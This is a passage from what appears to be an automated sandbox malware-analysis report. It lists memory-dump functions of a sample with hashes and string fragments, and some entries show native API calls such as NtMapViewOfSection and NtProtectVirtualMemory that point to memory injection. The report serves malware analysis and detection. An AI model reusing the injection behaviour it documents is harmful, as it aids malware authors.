                                        • API String ID: 0-3288562762
                                        • Opcode ID: 2700c35f8300a495086329e492738fe83198511da3d7b996b4aec8cccd3209c3
                                        • Instruction ID: 39fd3fbf7618f351fd23867d4f3259281a9d6d4e38518a4a482702c80217d92e
                                        • Opcode Fuzzy Hash: 2700c35f8300a495086329e492738fe83198511da3d7b996b4aec8cccd3209c3
                                        • Instruction Fuzzy Hash: 61F15F36E001148FDB54DFADC984A9DB7F2BB88310B1AC169E819EB351D731ED42CB90
                                        Function 05DF2878 Relevance: 1.7, Strings: 1, Instructions: 422COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =*$\
                                        • API String ID: 0-2246754351
                                        • Opcode ID: 234ffdda522c486ba53273898c3c5a9e347cab513ce870f93cad3ea9b5afbae9
                                        • Instruction ID: 97f2249cda3412014067ee9d9297e5d6ce1f6c3fe63e45013c57480f2b86fc6f
                                        • Opcode Fuzzy Hash: 234ffdda522c486ba53273898c3c5a9e347cab513ce870f93cad3ea9b5afbae9
                                        • Instruction Fuzzy Hash: 3D024079B002248FC754DFA8D890A6DB7F6BB88310B55C56AD849EB345DB31ED42CF90
                                        Function 05184D11 Relevance: 1.6, APIs: 1, Instructions: 72nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 05184DB6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: SectionView
                                        • String ID:
                                        • API String ID: 1323581903-0
                                        • Opcode ID: 2870d352128f569b8743fd0783c23bdfb7a003f03560b301558725c288d4d8f6
                                        • Instruction ID: f616d9401ff677fe6ca87dea5f4038bdf26bd10baa63fa049e30da4f59d1dad9
                                        • Opcode Fuzzy Hash: 2870d352128f569b8743fd0783c23bdfb7a003f03560b301558725c288d4d8f6
                                        • Instruction Fuzzy Hash: 5F310476900209AFDF10DFA9D880ADEBFF5FF48314F54851AE918A3210C7759950CFA4
                                        Function 05184D18 Relevance: 1.6, APIs: 1, Instructions: 70nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 05184DB6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: SectionView
                                        • String ID:
                                        • API String ID: 1323581903-0
                                        • Opcode ID: be7e33433c02a22b9f058bc2d91e9cfb20610ebfbe65340d82b5b43ed7ca75d2
                                        • Instruction ID: 857a06cdada5b0067d3fb5171732bafd9f222b5d6366eb71f58e1aeea74cc546
                                        • Opcode Fuzzy Hash: be7e33433c02a22b9f058bc2d91e9cfb20610ebfbe65340d82b5b43ed7ca75d2
                                        • Instruction Fuzzy Hash: EA310376900209AFDF10DFAAD880ADEBBF5FF4C324F54851AE918A3210C775A950CFA4
                                        Function 05184670 Relevance: 1.6, APIs: 1, Instructions: 67nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05184701
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: 00e7b536b29d2f2fa2fc4bc20a9cc788bdd9b302e0f69fdce0d0b4b5bae57bca
                                        • Instruction ID: d4f682ad4eaf1a4c529b8eb624fbb0409031a4115d367c3770b93c9ccab8b320
                                        • Opcode Fuzzy Hash: 00e7b536b29d2f2fa2fc4bc20a9cc788bdd9b302e0f69fdce0d0b4b5bae57bca
                                        • Instruction Fuzzy Hash: A12126B5D013499FDB10DFAAD980ADEFBF5FF48310F50881AE419A7250C775A900CBA4
                                        Function 05184B69 Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 05184BFC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: CreateSection
                                        • String ID:
                                        • API String ID: 2449625523-0
                                        • Opcode ID: 3a2e63b9808c97f18c8ba1589a12abd7eefcf6bb8cb64332549889fa2d200dcb
                                        • Instruction ID: b19f44ffbdeaaed1756ef4d7b77bb3acf5bf07688038f5fdb8767321e61b56b5
                                        • Opcode Fuzzy Hash: 3a2e63b9808c97f18c8ba1589a12abd7eefcf6bb8cb64332549889fa2d200dcb
                                        • Instruction Fuzzy Hash: DB2126B1D01259AFDB00DF9AD980ADEFBB4FF48310F50851AE518A7200C7799A54CFA4
                                        Function 05184A91 Relevance: 1.6, APIs: 1, Instructions: 65filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 05184B21
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FileOpen
                                        • String ID:
                                        • API String ID: 2669468079-0
                                        • Opcode ID: 46e631621368aa0372c247c43706380bd950d4ae9817379903b25b428e1aa3b3
                                        • Instruction ID: 8701f770c0bad5659a03a7d4c222a323d81bf558cad39b0ef6da5237255692d3
                                        • Opcode Fuzzy Hash: 46e631621368aa0372c247c43706380bd950d4ae9817379903b25b428e1aa3b3
                                        • Instruction Fuzzy Hash: 8221F4B1D01259AFDB00DFAAD984ADEFBB4FF48314F50851AE518A7240C7799A14CBA4
                                        Function 05184748 Relevance: 1.6, APIs: 1, Instructions: 64memorynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 051847D3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: aa90a7f091ea7c64f6754ea8d080ba22aa603d8554f28ee30c4fc55c95af29be
                                        • Instruction ID: 57122775229b8b29b2aa00d17da9c3a0ff9ec17ad5af18a00d4f8ce17e9bea85
                                        • Opcode Fuzzy Hash: aa90a7f091ea7c64f6754ea8d080ba22aa603d8554f28ee30c4fc55c95af29be
                                        • Instruction Fuzzy Hash: 642123B69002499FDB10DFAAD880BDEFBF5FF48310F50881AE518A7210C774A954CFA4
                                        Function 05184B70 Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 05184BFC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: CreateSection
                                        • String ID:
                                        • API String ID: 2449625523-0
                                        • Opcode ID: 78f1228fb58f374307b5973e287ee015e6a41429f53223dba017b7ee12d01714
                                        • Instruction ID: 88b910d2d0870601ba853f290d1753782c46029413f8388458a06dbd70f4c12c
                                        • Opcode Fuzzy Hash: 78f1228fb58f374307b5973e287ee015e6a41429f53223dba017b7ee12d01714
                                        • Instruction Fuzzy Hash: 872105B1D01259AFDF10DFAAD980AEEFBB4FF48310F50851AE518A7240C7759954CFA4
                                        Function 05184678 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05184701
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: 7e4eb047a15ef302dc237cd4d61bf297c0e521b72380615cfe9b924ee7919e55
                                        • Instruction ID: fc3fea0dd5e4db458c70a4827b1e7eec63ee31f97b9e978ded70164bceb6fb58
                                        • Opcode Fuzzy Hash: 7e4eb047a15ef302dc237cd4d61bf297c0e521b72380615cfe9b924ee7919e55
                                        • Instruction Fuzzy Hash: BA21F4B1D013499FDB10DFAAD880AAEFBF5FF48310F50882AE419A7240C775A904CBA4
                                        Function 05184A98 Relevance: 1.6, APIs: 1, Instructions: 63filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 05184B21
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FileOpen
                                        • String ID:
                                        • API String ID: 2669468079-0
                                        • Opcode ID: a4b447202d6c19d86c03622b44ab87fa8f5f90c729e266ec0c5b8070722ed67e
                                        • Instruction ID: f293caa5e124ccc00e0b1def7d5573e7a96c5af92ff6db398e79b39ba4c0909c
                                        • Opcode Fuzzy Hash: a4b447202d6c19d86c03622b44ab87fa8f5f90c729e266ec0c5b8070722ed67e
                                        • Instruction Fuzzy Hash: EC2105B1D01259AFDB00DFAAD884ADEFBB4FF48314F50851AE518A7240C7759A14CFA4
                                        Function 05184ED0 Relevance: 1.6, APIs: 1, Instructions: 62filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 05184F56
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: ControlDeviceFile
                                        • String ID:
                                        • API String ID: 3512290074-0
                                        • Opcode ID: 3c1b055a2c19fa64ae37de199e0c2b31986e196422361e3f1630d54ce8febec9
                                        • Instruction ID: bf4f1978bacce6b540e20afee25d802c8c9b7fa649ca7c67070fda274067e230
                                        • Opcode Fuzzy Hash: 3c1b055a2c19fa64ae37de199e0c2b31986e196422361e3f1630d54ce8febec9
                                        • Instruction Fuzzy Hash: 042159728002499FDF10DFAAD840AEEFBF5FF48314F54881AE519A7250C7799914CFA4
                                        Function 05184EC8 Relevance: 1.6, APIs: 1, Instructions: 62filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 05184F56
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: ControlDeviceFile
                                        • String ID:
                                        • API String ID: 3512290074-0
                                        • Opcode ID: b63657978053fa35a9f0b96af4c499c4044ef8f9286efe452c9155df9931539e
                                        • Instruction ID: 4eada2ad4764fc1931cf8e357dbf6a427df7756027aaee9d8134555797f76dbf
                                        • Opcode Fuzzy Hash: b63657978053fa35a9f0b96af4c499c4044ef8f9286efe452c9155df9931539e
                                        • Instruction Fuzzy Hash: DE2166728002499FDF11DFAAC840AEEBBF5BF48314F15881AE918A3210C7399910CFA0
                                        Function 05184750 Relevance: 1.6, APIs: 1, Instructions: 61memorynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 051847D3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: 65b10d067d50d65eb53c1adf93c1d81b25f4946491b68a858d932d126d8ce4bb
                                        • Instruction ID: 2fb68418630e207152820cf00c30b61e4428766c525499688cdeac48a98424b1
                                        • Opcode Fuzzy Hash: 65b10d067d50d65eb53c1adf93c1d81b25f4946491b68a858d932d126d8ce4bb
                                        • Instruction Fuzzy Hash: C52134B19003499FDB10DFAAD880ADEFBF4BF48310F50881AE518A7200C774A914CFA4
                                        Function 05184E00 Relevance: 1.6, APIs: 1, Instructions: 60filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 05184E7F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FileInformationQueryVolume
                                        • String ID:
                                        • API String ID: 634242254-0
                                        • Opcode ID: 8f7e9c4e75795976395868933ef31027cf6146f7b303e52ee83b14cff756b00c
                                        • Instruction ID: 7d0887ea72d897c034311e641fc8eabedc059f319a21a826d43e4796ad4e7978
                                        • Opcode Fuzzy Hash: 8f7e9c4e75795976395868933ef31027cf6146f7b303e52ee83b14cff756b00c
                                        • Instruction Fuzzy Hash: 442134B19003499FDB10DFAAD884BEEFBF4AB48310F54881AD419A7250C778A945CFA4
                                        Function 05184E08 Relevance: 1.6, APIs: 1, Instructions: 57filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 05184E7F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FileInformationQueryVolume
                                        • String ID:
                                        • API String ID: 634242254-0
                                        • Opcode ID: e444669f18ecd484891289d290ba412b5c3b55ab60d33f7996b31961f9b538f8
                                        • Instruction ID: b5c358247defc95db083370f413300ad273334ca391a9e17e968ea52e027a060
                                        • Opcode Fuzzy Hash: e444669f18ecd484891289d290ba412b5c3b55ab60d33f7996b31961f9b538f8
                                        • Instruction Fuzzy Hash: 692124B1D003499FDB10DFAAD884BEEFBF4AF48310F54882AD419A7250C778A944CFA4
                                        Function 06C75F80 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: N'#r
                                        • API String ID: 0-1731184390
                                        • Opcode ID: 4e75daaa73d015a064495e4791db14bcd0253462cfb6c2f51dda64da9109ada2
                                        • Instruction ID: b804bb85ed22ddc724640128f7df6ff05aacb64c38def7c17df2ca949bb70ee5
                                        • Opcode Fuzzy Hash: 4e75daaa73d015a064495e4791db14bcd0253462cfb6c2f51dda64da9109ada2
                                        • Instruction Fuzzy Hash: 4CB10836F012248FDB58DFADC89869DB7F2AB88300F5581AAD809EB341DB749D45CBD0
                                        Function 051841B8 Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 4f764858570c1a45fd6abbfe97f885b62aa368bc02bba011617738333c00b6be
                                        • Instruction ID: 1e14be6f38dbc8cdcc01a98e2debc20d19af03e84de82dbf935665e04a79e67f
                                        • Opcode Fuzzy Hash: 4f764858570c1a45fd6abbfe97f885b62aa368bc02bba011617738333c00b6be
                                        • Instruction Fuzzy Hash: BD112B71D003498FDB14DFAAD8457AEFBF5EF88214F15881AC419A7240C778A945CFA4
                                        Function 051841C0 Relevance: 1.5, APIs: 1, Instructions: 49nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 1a9780a06c1880ad0bd9dd4e5dd7c318a13d2f08aa39b21ca3bfc15d8389507e
                                        • Instruction ID: 5d1f58ac59f5b3ec194444c3f400851e3d0710557576dbf717f0a8897bd3b058
                                        • Opcode Fuzzy Hash: 1a9780a06c1880ad0bd9dd4e5dd7c318a13d2f08aa39b21ca3bfc15d8389507e
                                        • Instruction Fuzzy Hash: 3A113A71D003498FDB20DFAAD8447AEFBF5AB88214F14881AC419A7240C778A944CFA4
                                        Function 05DFB6E0 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #dym^
                                        • API String ID: 0-2050938880
                                        • Opcode ID: 2dc753f892a918e1a0da75449a16fe3c2dc03ef5349723c3ac751cd682dccd73
                                        • Instruction ID: ead89b37e3ddd9b018b4d0cd7d0bc7a37e1bdd39a064a1562d42cc97c6dc061d
                                        • Opcode Fuzzy Hash: 2dc753f892a918e1a0da75449a16fe3c2dc03ef5349723c3ac751cd682dccd73
                                        • Instruction Fuzzy Hash: 9D91D575F102559BDB05DF6DE8A166EB7E2BFC4214B49853BE808EB304EB34DD058B81
                                        Function 05DFB728 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #dym^
                                        • API String ID: 0-2050938880
                                        • Opcode ID: eaa75b4517f4fea32c2dcb9676aa7f712c97a60c7ca8eb5a1c234e02ce5ef9e9
                                        • Instruction ID: 05f097bf093e9f415920fe05bc6abbb68d49326690db4ad987e1e9372813dcec
                                        • Opcode Fuzzy Hash: eaa75b4517f4fea32c2dcb9676aa7f712c97a60c7ca8eb5a1c234e02ce5ef9e9
                                        • Instruction Fuzzy Hash: 5A81B175F102168BEB41EF6DE89166EB7E2BFC4214B45853BD908EB304EB34DD058B81
                                        Function 05DF5DD8 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: +\
                                        • API String ID: 0-4036785194
                                        • Opcode ID: 266706228393651a06bfe781c13bd812f10a77ff236e42be9796f55f4b0b5dd5
                                        • Instruction ID: f065d04478d459961e8e6087c74f40257c14bcd8a7041999bd134af448841ac3
                                        • Opcode Fuzzy Hash: 266706228393651a06bfe781c13bd812f10a77ff236e42be9796f55f4b0b5dd5
                                        • Instruction Fuzzy Hash: CE61B036B102698FCB15EFACD8905AEB7F6EF88350B16856AD915EB341DA30DD01CBD0
                                        Function 02B4BE98 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (K8!
                                        • API String ID: 0-1677432393
                                        • Opcode ID: 88cb4c60a5f98be2111cfecd78181f22829e523985cd2a74e8c289c990b826f2
                                        • Instruction ID: d0d3145fb3868d8edab223bdba1d0c9eaa113470314ecddf053a14249699dcad
                                        • Opcode Fuzzy Hash: 88cb4c60a5f98be2111cfecd78181f22829e523985cd2a74e8c289c990b826f2
                                        • Instruction Fuzzy Hash: AA51BF36F001258FCB08DEA9C8945AEB7F6BF8825475641A9E905EB3A1DB35DD01CBD0
                                        Function 02B4BEA8 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (K8!
                                        • API String ID: 0-1677432393
                                        • Opcode ID: 8c4d8f6730d90ec0b0bd5a441cf1e479739833094326106bf6758c92263a07be
                                        • Instruction ID: 223fdd0a90be045a683ada9b84a396c1c83ddeb4f10228c7bcc0a6f30d2cedc7
                                        • Opcode Fuzzy Hash: 8c4d8f6730d90ec0b0bd5a441cf1e479739833094326106bf6758c92263a07be
                                        • Instruction Fuzzy Hash: 5E51C136F001298F8B08DFADC8945AEB7F6BF8821475641A9D905EB3A1DB35DC01CBD0
                                        Function 05A05078 Relevance: .9, Instructions: 859COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 368f2158344882ceb95ee8d3c5881ce53c7ca24019cf8908dc657f85db465127
                                        • Instruction ID: 86699b748bebcbda51aac4e834e6fd3cb8c8e07ebc746c2fb98173f40ebdf99d
                                        • Opcode Fuzzy Hash: 368f2158344882ceb95ee8d3c5881ce53c7ca24019cf8908dc657f85db465127
                                        • Instruction Fuzzy Hash: 6962E435B102148FD704DF69D895A69BBF6FF89310B59C06AD80ADB396DB31ED06CB80
                                        Function 06C70148 Relevance: .8, Instructions: 784COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b583749c6502e3c2f4d3bd9431adae78219ec0815dcff5385c9330df87f7e230
                                        • Instruction ID: 65f507f5253f2a023374f254a6d100cd15b371fb7d1832baa01c5e656be8d401
                                        • Opcode Fuzzy Hash: b583749c6502e3c2f4d3bd9431adae78219ec0815dcff5385c9330df87f7e230
                                        • Instruction Fuzzy Hash: 4352A276F102248FDB54DF68C890A99B7F2BB88310B55856AE809EB341DB35DD46CBD0
                                        Function 05DFE898 Relevance: .7, Instructions: 727COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51b5fc2d8b33f30c31d02c9260ffe577d842e5f1e487bd197cf8e55ddc014386
                                        • Instruction ID: 8274d7763e93f55ebfbd695578656fa5f60ed6af11cf24d8d186cc148f90522a
                                        • Opcode Fuzzy Hash: 51b5fc2d8b33f30c31d02c9260ffe577d842e5f1e487bd197cf8e55ddc014386
                                        • Instruction Fuzzy Hash: 4342C535F001159FCB54DFA8D8949AEB7E7EF88310B1A856AD909EB391DB349D02CBD0
                                        Function 05A00040 Relevance: .7, Instructions: 706COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 334ee47431e752ddd8565cf5ec7dda553a77b4eea2de81ce359fc1c21febaea0
                                        • Instruction ID: d8923d7d9dd217cb4d56815c3d7595aa22253d20f2cc0d1ae6419637e402593b
                                        • Opcode Fuzzy Hash: 334ee47431e752ddd8565cf5ec7dda553a77b4eea2de81ce359fc1c21febaea0
                                        • Instruction Fuzzy Hash: 6842B336B102148FC754DF68D894A69F7E3BF8831475AC56AD80AEB395DB31EC46CB80
                                        Function 0518B050 Relevance: .6, Instructions: 624COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 751e255d4de094d1ac22c515b5aef640fe5ce6b0e77b9aa40bce2d0943aee614
                                        • Instruction ID: df8223327ae307942d32315d2709ae626fc5d2d2e2c0a6e0f8cd5aec1755ddf4
                                        • Opcode Fuzzy Hash: 751e255d4de094d1ac22c515b5aef640fe5ce6b0e77b9aa40bce2d0943aee614
                                        • Instruction Fuzzy Hash: 7E62F474E10208EFCB48EFA4D59569DBBB2FF85305F6084ADE406A7390CB35AA81CF50
                                        Function 0518B060 Relevance: .6, Instructions: 619COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d17fdbecbf2239961d81098fe6ac24e87e2b49250a09f1e29d7318989c41912
                                        • Instruction ID: 6a18b249588a7d9b5d7089dd212c66d2368a38ad53502b77b95c21380113fb02
                                        • Opcode Fuzzy Hash: 6d17fdbecbf2239961d81098fe6ac24e87e2b49250a09f1e29d7318989c41912
                                        • Instruction Fuzzy Hash: 3C62E474E10208EFCB58EFA4D59569DBBB2FF85305F6084ADE406A7390CB35AA85CF50
                                        Function 02B49970 Relevance: .4, Instructions: 439COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
